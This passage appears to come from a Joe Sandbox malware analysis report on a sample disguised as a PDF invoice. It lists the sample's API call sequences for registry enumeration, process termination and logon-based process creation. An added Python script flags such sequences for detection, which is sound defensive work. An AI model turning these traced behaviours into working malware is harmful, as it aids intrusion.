                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove$__itow__swprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3253778849-0
                                                                                                                      • Opcode ID: 80b5b34108944b4165bc1cf5c6d501e0a968af88b2aa23ea6038a87017b1d6f0
                                                                                                                      • Instruction ID: 6c2b998bbf63f20502357cda86acc6054873ac67d7f32004635076aeeec6d845
                                                                                                                      • Opcode Fuzzy Hash: 80b5b34108944b4165bc1cf5c6d501e0a968af88b2aa23ea6038a87017b1d6f0
                                                                                                                      • Instruction Fuzzy Hash: 69619B3050069ADBDF11EF24C88AFFE37A8AF44308F444559FE5A5B292DB7CA945CB90
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                                                                                                                        • Part of subcall function 007D10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007D0038,?,?), ref: 007D10BC
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007D0548
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007D0588
                                                                                                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 007D05AB
                                                                                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 007D05D4
                                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 007D0617
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 007D0624
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4046560759-0
                                                                                                                      • Opcode ID: 8a1764192edd54b3c2c7ae451d26f11d0310ed89bf964bd58a83b0d92b08ee13
                                                                                                                      • Instruction ID: 1a805e111a9bf99d30e3797cb12f51f5f2ba27603b56899138ee7ec616dadaf3
                                                                                                                      • Opcode Fuzzy Hash: 8a1764192edd54b3c2c7ae451d26f11d0310ed89bf964bd58a83b0d92b08ee13
                                                                                                                      • Instruction Fuzzy Hash: FE514D31508240DFC714EF24D889E6ABBF8FF85314F04891EF946972A1DB79E915CB92
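                                                                                                                       The records in this section list each function's Win32 calls in the order the disassembler found them, and that order is what a detection engineer keys on: the two combase.dll records resolve RoInitialize and RoUninitialize at run time through LoadLibraryExW and GetProcAddress and then wrap the result in EncodePointer/DecodePointer, and the record directly above opens and walks a registry key with RegConnectRegistryW, RegOpenKeyExW and RegEnumValueW (RegConnectRegistryW accepts a machine name, so this routine can enumerate a remote registry as well as the local one). The Python below is an added example, not part of the Joe Sandbox report or of the sample's own code: it parses records in this layout (direct call lines, "Part of subcall function" lines, and the Similarity fields) and flags call sequences of interest as ordered subsequences, so that extra calls between the ones of interest do not break the match. SAMPLE_REPORT is a constructed excerpt in the report's layout, built from the call lines shown above; the rule labels and the shape of the hit dictionaries are assumptions of this example.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed excerpt in the layout of the report's per-function records
# (two records, trimmed). Call lines, refs and hashes are the ones shown above.
SAMPLE_REPORT = """\
APIs
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00774292,?), ref: 007741E3
• GetProcAddress.KERNEL32(00000000), ref: 007741EA
• EncodePointer.KERNEL32(00000000), ref: 007741F6
• DecodePointer.KERNEL32(00000001,00774292,?), ref: 00774213
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
Similarity
• API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
• String ID: RoInitialize$combase.dll
• Instruction Fuzzy Hash: 89E01AB0692344BEEF206BB1EC0DB543AA8BB24742F51D425F916D50A0DBBE40928F04
APIs
  • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007D0548
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007D0588
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 007D05D4
• RegCloseKey.ADVAPI32(00000000), ref: 007D0624
Similarity
• API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
• String ID:
• Instruction Fuzzy Hash: FE514D31508240DFC714EF24D889E6ABBF8FF85314F04891EF946972A1DB79E915CB92
"""

# One call line: optional "Part of subcall function XXXX:" prefix, Name.MODULE,
# optional "(args)", optional comma, then "ref: ADDR". Lines such as
# "_memmove.LIBCMT ref: 00757F82" have neither parentheses nor comma.
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# Key/value bullet such as "• String ID: RoInitialize$combase.dll".
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<value>.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str
    subcall_of: Optional[str] = None  # set when the report marks the line as part of a subcall


@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    fields: Dict[str, str] = field(default_factory=dict)


def parse_records(text: str) -> List[FunctionRecord]:
    """Split report text into per-function records; each 'APIs' heading starts one."""
    records: List[FunctionRecord] = []
    current: Optional[FunctionRecord] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionRecord()
            records.append(current)
            continue
        if current is None:
            continue
        m = CALL_RE.match(line)
        if m:
            raw_args = m.group("args")
            args = [a.strip() for a in raw_args.split(",")] if raw_args else []
            current.calls.append(ApiCall(m.group("name"), m.group("module"), args,
                                         m.group("ref").upper(), m.group("sub")))
            continue
        m = FIELD_RE.match(line)
        if m:
            current.fields[m.group("key").strip()] = m.group("value").strip()
    return records


def api_sequence(record: FunctionRecord, include_subcalls: bool = False) -> List[str]:
    """Ordered API names of a record; subcall lines are dropped unless requested."""
    return [c.name for c in record.calls if include_subcalls or c.subcall_of is None]


def contains_in_order(seq: List[str], pattern: List[str]) -> bool:
    """True if every name in pattern occurs in seq in that order (gaps allowed)."""
    it = iter(seq)
    return all(any(name == want for name in it) for want in pattern)


# Sequences of interest, matched against a record's direct calls. Labels are this
# example's own wording, not report terminology.
RULES = {
    "dynamic import with pointer-encoded GetProcAddress result":
        ["LoadLibraryExW", "GetProcAddress", "EncodePointer"],
    "registry value enumeration via RegConnectRegistryW":
        ["RegConnectRegistryW", "RegOpenKeyExW", "RegEnumValueW"],
}


def flag_records(records: List[FunctionRecord]) -> List[dict]:
    """Return one hit per (record, rule) match with the pivots an analyst wants next."""
    hits = []
    for idx, rec in enumerate(records):
        seq = api_sequence(rec)
        for label, pattern in RULES.items():
            if not contains_in_order(seq, pattern):
                continue
            first = next(c for c in rec.calls if c.name == pattern[0] and c.subcall_of is None)
            hits.append({
                "record": idx,
                "rule": label,
                "entry_ref": first.ref,  # address of the first call in the pattern
                "library": first.args[0] if first.name == "LoadLibraryExW" and first.args else None,
                "string_id": rec.fields.get("String ID", ""),
                "fuzzy_hash": rec.fields.get("Instruction Fuzzy Hash", ""),
            })
    return hits


if __name__ == "__main__":
    for hit in flag_records(parse_records(SAMPLE_REPORT)):
        print(hit)
```

                                                                                                                       Two caveats apply when using hits like these. The LoadLibraryExW/GetProcAddress/EncodePointer pattern is also how an ordinary runtime delay-loads a WinRT entry point on systems that may lack it, so on its own it is a clustering pivot (via the Instruction Fuzzy Hash) rather than a verdict; and the API ID field is the sandbox's aggregate of the call names, so it tells you which APIs a function uses but not their order, which is why the example keeps the ordered list.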
                                                                                                                      APIs
                                                                                                                      • GetMenu.USER32(?), ref: 007D5A82
                                                                                                                      • GetMenuItemCount.USER32(00000000), ref: 007D5AB9
                                                                                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 007D5AE1
                                                                                                                      • GetMenuItemID.USER32(?,?), ref: 007D5B50
                                                                                                                      • GetSubMenu.USER32(?,?), ref: 007D5B5E
                                                                                                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 007D5BAF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$Item$CountMessagePostString
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 650687236-0
                                                                                                                      • Opcode ID: f8cda55c61c165bc7c64788d9eebbc2e804b9f31f2d962fe1dd4fd7cc0ecf34f
                                                                                                                      • Instruction ID: 5488ba54c48ddb8239a91e8a415689d621a3f53410f29ce094f349524c0f0b42
                                                                                                                      • Opcode Fuzzy Hash: f8cda55c61c165bc7c64788d9eebbc2e804b9f31f2d962fe1dd4fd7cc0ecf34f
                                                                                                                      • Instruction Fuzzy Hash: 30517F75A00615EFCF11DF64C845AEEBBB4EF48310F14846AE956B7351CB78AE41CB90
                                                                                                                      APIs
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 007AF3F7
                                                                                                                      • VariantClear.OLEAUT32(00000013), ref: 007AF469
                                                                                                                      • VariantClear.OLEAUT32(00000000), ref: 007AF4C4
                                                                                                                      • _memmove.LIBCMT ref: 007AF4EE
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 007AF53B
                                                                                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 007AF569
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1101466143-0
                                                                                                                      • Opcode ID: 42191b8e5d10618f6b131f08b393182c79b0734e99406a42cc157ed160478538
                                                                                                                      • Instruction ID: 3ca79c27bb5ded022b6ae050a4bdddd41ae45192a54bba18ade0e70bb877b41c
                                                                                                                      • Opcode Fuzzy Hash: 42191b8e5d10618f6b131f08b393182c79b0734e99406a42cc157ed160478538
                                                                                                                      • Instruction Fuzzy Hash: B4516D75A00249DFCB14CF58D884AAAB7B8FF8D354B158669ED59DB300D734E911CFA0
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 007B2747
                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007B2792
                                                                                                                      • IsMenu.USER32(00000000), ref: 007B27B2
                                                                                                                      • CreatePopupMenu.USER32 ref: 007B27E6
                                                                                                                      • GetMenuItemCount.USER32(000000FF), ref: 007B2844
                                                                                                                      • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 007B2875
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3311875123-0
                                                                                                                      • Opcode ID: 1195c19135a554585206656a0b4aea5450f68583379d236a2d65b54cd05542b2
                                                                                                                      • Instruction ID: 87fac09c8b8d9708c6235a664f165409314cf33e4b39bc094aed460099eb9fca
                                                                                                                      • Opcode Fuzzy Hash: 1195c19135a554585206656a0b4aea5450f68583379d236a2d65b54cd05542b2
                                                                                                                      • Instruction Fuzzy Hash: 7F51C170A02309DFDF25CF68D888BEEBBF5AF44314F104229E4159B292D7789906CB61
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
                                                                                                                      • BeginPaint.USER32(?,?,?,?,?,?), ref: 0075179A
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 007517FE
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 0075181B
                                                                                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0075182C
                                                                                                                      • EndPaint.USER32(?,?), ref: 00751876
                                                                                                                      Similarity
                                                                                                                      • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1827037458-0
                                                                                                                      • Opcode ID: 8231f531cce8a1fef7ed8f38090de58ae68a32bdd799ca2392fcd2258a15ebd9
                                                                                                                      • Instruction ID: d45a192b2fff4b24e434c4763c1621ee4a72ba1bd3da33d6ffe3b8e8196de3f1
                                                                                                                      • Opcode Fuzzy Hash: 8231f531cce8a1fef7ed8f38090de58ae68a32bdd799ca2392fcd2258a15ebd9
                                                                                                                      • Instruction Fuzzy Hash: 85419F70100201AFD710DF25CC84BB67BF8FB49736F048669F9A5862A1D779A849DB62
                                                                                                                      APIs
                                                                                                                      • ShowWindow.USER32(008167B0,00000000,019059A0,?,?,008167B0,?,007DB862,?,?), ref: 007DB9CC
                                                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 007DB9F0
                                                                                                                      • ShowWindow.USER32(008167B0,00000000,019059A0,?,?,008167B0,?,007DB862,?,?), ref: 007DBA50
                                                                                                                      • ShowWindow.USER32(00000000,00000004,?,007DB862,?,?), ref: 007DBA62
                                                                                                                      • EnableWindow.USER32(00000000,00000001), ref: 007DBA86
                                                                                                                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 007DBAA9
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Show$Enable$MessageSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 642888154-0
                                                                                                                      • Opcode ID: 00aeab717322b7b70e58ab44f152c4a60398f34bdba8731a301037ff5ba4d0d4
                                                                                                                      • Instruction ID: 7cb32572f1e0bb9d048d8a7308f729274b2336ba64799535b441b8bf92452976
                                                                                                                      • Opcode Fuzzy Hash: 00aeab717322b7b70e58ab44f152c4a60398f34bdba8731a301037ff5ba4d0d4
                                                                                                                      • Instruction Fuzzy Hash: 16414F34601241EFDB21CF24C499B957BF0FB49310F1A82BBEA499F7A2C739A845CB51
                                                                                                                      APIs
                                                                                                                      • GetForegroundWindow.USER32(?,?,?,?,?,?,007C5134,?,?,00000000,00000001), ref: 007C73BF
                                                                                                                        • Part of subcall function 007C3C94: GetWindowRect.USER32(?,?), ref: 007C3CA7
                                                                                                                      • GetDesktopWindow.USER32 ref: 007C73E9
                                                                                                                      • GetWindowRect.USER32(00000000), ref: 007C73F0
                                                                                                                      • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 007C7422
                                                                                                                        • Part of subcall function 007B54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007B555E
                                                                                                                      • GetCursorPos.USER32(?), ref: 007C744E
                                                                                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 007C74AC
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4137160315-0
                                                                                                                      • Opcode ID: 4399ec63805a0b902c0ab2639b1c04b286a6b18314aa2cae3aaa2181d3f7fa76
                                                                                                                      • Instruction ID: 7ed29c7025c61f9c2cee4f5f72d822511dcbc336863d82fbd2d22b4656297fc5
                                                                                                                      • Opcode Fuzzy Hash: 4399ec63805a0b902c0ab2639b1c04b286a6b18314aa2cae3aaa2181d3f7fa76
                                                                                                                      • Instruction Fuzzy Hash: 22310432509345ABC728DF14D849F9BBBE9FF88314F00491EF48997191CB38EA08CB92
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 007A85F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007A8608
                                                                                                                        • Part of subcall function 007A85F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007A8612
                                                                                                                        • Part of subcall function 007A85F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007A8621
                                                                                                                        • Part of subcall function 007A85F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 007A8628
                                                                                                                        • Part of subcall function 007A85F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 007A863E
                                                                                                                      • GetLengthSid.ADVAPI32(?,00000000,007A8977), ref: 007A8DAC
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 007A8DB8
                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 007A8DBF
                                                                                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 007A8DD8
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,007A8977), ref: 007A8DEC
                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 007A8DF3
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3008561057-0
                                                                                                                      • Opcode ID: 19105afd2250670dfdc13655f3fcee47a609426306ab0a0cf5ed4c7e968147cc
                                                                                                                      • Instruction ID: a5eec58c9952b7f214b30e01d813bd7496c16aae889d268c83d3e03c5e8bab78
                                                                                                                      • Opcode Fuzzy Hash: 19105afd2250670dfdc13655f3fcee47a609426306ab0a0cf5ed4c7e968147cc
                                                                                                                      • Instruction Fuzzy Hash: 78110332601605FFDB549F64CC08BAE7B79FF8A315F10822AF88697250CB3A9D00CB61
                                                                                                                      APIs
                                                                                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 007A8B2A
                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 007A8B31
                                                                                                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 007A8B40
                                                                                                                      • CloseHandle.KERNEL32(00000004), ref: 007A8B4B
                                                                                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 007A8B7A
                                                                                                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 007A8B8E
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1413079979-0
                                                                                                                      • Opcode ID: e235678695c3f86b0fa186ed8fc8aa9fea3b55e2d9478a52d54d13419f7e9e3b
                                                                                                                      • Instruction ID: 9966d33e0ae0d01789eee5e0c13f3c993a338beddecc534543b556ce826a5fcb
                                                                                                                      • Opcode Fuzzy Hash: e235678695c3f86b0fa186ed8fc8aa9fea3b55e2d9478a52d54d13419f7e9e3b
                                                                                                                      • Instruction Fuzzy Hash: D41129B2501209ABDF018FA8ED49FDE7BB9FF49314F048165FE05A2160C77A9D60AB61
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 007512F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0075134D
                                                                                                                        • Part of subcall function 007512F3: SelectObject.GDI32(?,00000000), ref: 0075135C
                                                                                                                        • Part of subcall function 007512F3: BeginPath.GDI32(?), ref: 00751373
                                                                                                                        • Part of subcall function 007512F3: SelectObject.GDI32(?,00000000), ref: 0075139C
                                                                                                                      • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 007DC1C4
                                                                                                                      • LineTo.GDI32(00000000,00000003,?), ref: 007DC1D8
                                                                                                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 007DC1E6
                                                                                                                      • LineTo.GDI32(00000000,00000000,?), ref: 007DC1F6
                                                                                                                      • EndPath.GDI32(00000000), ref: 007DC206
                                                                                                                      • StrokePath.GDI32(00000000), ref: 007DC216
                                                                                                                      Similarity
                                                                                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 43455801-0
                                                                                                                      • Opcode ID: c9b6239b6eefc246cab1a9a293fe6b84abcd7c86e41d26f95ca7863b41952d1f
                                                                                                                      • Instruction ID: a604100b110a54bec08643f68b9beae481037c1d470e81ee1ab04db64708d53d
                                                                                                                      • Opcode Fuzzy Hash: c9b6239b6eefc246cab1a9a293fe6b84abcd7c86e41d26f95ca7863b41952d1f
                                                                                                                      • Instruction Fuzzy Hash: A811F77640010DBFDB129F90DC88EEA7FADFF08354F048022FA195A161D7769E55DBA0
                                                                                                                      APIs
                                                                                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 007703D3
                                                                                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 007703DB
                                                                                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 007703E6
                                                                                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 007703F1
                                                                                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 007703F9
                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00770401
                                                                                                                      Similarity
                                                                                                                      • API ID: Virtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4278518827-0
                                                                                                                      • Opcode ID: b1c7803407d19264834d46be53cda52b9cdb9ee9263ff325e70b419147878ac6
                                                                                                                      • Instruction ID: 639564cf0432b3fd9fe4738413ae39a99cb4a4aa752333ca53fb88f985ce0813
                                                                                                                      • Opcode Fuzzy Hash: b1c7803407d19264834d46be53cda52b9cdb9ee9263ff325e70b419147878ac6
                                                                                                                      • Instruction Fuzzy Hash: 8B0148B0902759BDE3008F5A8C85A52FFA8FF19354F00411BE15847941C7B5A864CBE5
                                                                                                                      APIs
                                                                                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 007B569B
                                                                                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 007B56B1
                                                                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 007B56C0
                                                                                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007B56CF
                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007B56D9
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007B56E0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 839392675-0
                                                                                                                      • Opcode ID: a978426bfc4dfe94826e72955f2ea0cc1a506a3fce9b932ce0bc7fedb7a9620e
                                                                                                                      • Instruction ID: ea053f3a7939fe805057978136113968c99ab897f24ddb7388bc1c8da4aba3e0
                                                                                                                      • Opcode Fuzzy Hash: a978426bfc4dfe94826e72955f2ea0cc1a506a3fce9b932ce0bc7fedb7a9620e
                                                                                                                      • Instruction Fuzzy Hash: 1CF03032242158BBE7215BA2DC0DEEF7F7CEFC6B11F04416AFA06D1050D7A95A0186B9
                                                                                                                      APIs
                                                                                                                      • InterlockedExchange.KERNEL32(?,?), ref: 007B74E5
                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,00761044,?,?), ref: 007B74F6
                                                                                                                      • TerminateThread.KERNEL32(00000000,000001F6,?,00761044,?,?), ref: 007B7503
                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00761044,?,?), ref: 007B7510
                                                                                                                        • Part of subcall function 007B6ED7: CloseHandle.KERNEL32(00000000,?,007B751D,?,00761044,?,?), ref: 007B6EE1
                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 007B7523
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00761044,?,?), ref: 007B752A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3495660284-0
